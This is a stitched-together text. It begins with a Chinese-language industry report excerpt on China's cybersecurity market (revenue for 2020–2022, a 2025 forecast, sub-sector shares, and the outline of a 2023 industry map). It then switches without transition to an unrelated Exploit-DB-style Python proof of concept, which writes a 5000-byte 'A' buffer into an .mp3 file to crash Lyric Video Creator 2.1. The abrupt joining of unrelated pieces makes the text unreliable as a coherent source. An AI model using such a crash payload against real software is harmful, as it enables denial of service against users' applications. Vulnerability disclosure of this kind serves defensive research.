网络安全产业是当今数字化时代不可或缺的重要领域，其中细分赛道的发展更是引人注目。通过本次调研，在排名TOP10的细分领域与收录占比分别是：渗透测试2.16%、演练保障2.01%、态势感知1.95%、合规检测1.91%、安全意识培训1.87%、数据库安全1.82%、数据防泄露（DLP）1.66%、安全运维管理1.66%、可拓展威胁检测与响应（XDR）1.59%、零信任1.59%。可以看出以上细分领域在网络安全产业中占据一定的热度与重要性。 根据嘶吼安全产业研究院调研数据显示，2020年中国网络安全产业的安全总营收达到591亿元；2021年中国网络安全产业总营收达到734亿元，同比增长24%；2022年中国网络安全产业总营收达到747亿元，同比增长2%。2022年的营收增长率有所减缓，但依然处于增长趋势，故嘶吼安全产业研究院仍然看好未来行业趋势，预估从今年开始中国网络安全厂商的安全总营收将迎来平稳增长期，到2025年有望突破1300亿。 营收占比方面，根据嘶吼安全产业研究院调研的121个细分领域分析显示，防火墙、工控安全审计、合规检测、安全集成、漏洞与监测，分别以9.2%、6.6%、4.5%、3.1%、3.1%的占比，占据前五位置。此外，根据调研数据统计，中国网络安全厂商的主要客户领域占比依次为：政府与公共机构、金融、运营商、商企。 展望 随着科技不断的发展，网络安全产业以及其他行业产业都迎来了更多的机会和发展空间。笔者认为，在未来的数年中，行业将以创新国产化、安全产业服务极简化、AI自动化、大模型生态化为主旋律，进入行业革新的快速发展阶段。我们可以期待更强大、更智能和可持续的网络安全解决方案的出现。网络安全将迎来更加安全、可靠和稳定的未来，保护我们的数字世界免受威胁，创造一个安全的网络环境。 嘶吼2023网络安全产业图谱全图分解： 一、基础技术与通用 二、网络与通信安全 三、安全服务 四、应用与产业安全 五、数据安全 六、终端安全 七、开发与应用安全 关注嘶吼公众号“嘶吼专业版”回复“2023图谱”获取《嘶吼2023网络安全产业图谱》完整版下载方式。

# -*- coding: utf-8 -*- # Exploit Title: Lyric Video Creator 2.1 - '.mp3' Denial of Service (PoC) # Date: 08/05/2019 # Author: Alejandra Sánchez # Vendor Homepage: https://lyricvideocreator.com/ # Software Link: https://lyricvideocreator.com/dwl/LyricVideoCreator.exe # Version: 2.1 # Tested on: Windows 10 # Proof of Concept: # 1.- Run the python script "LyricVideo.py", it will create a new file "sample.mp3" # 2.- Open LyricVideoCreator.exe # 4.- Click on the 'Browse song' button, select the 'sample.mp3' file created and click on the 'Open' button # 5.- Crashed buffer = "\x41" * 5000 f = open ("sample.mp3", "w") f.write(buffer) f.close()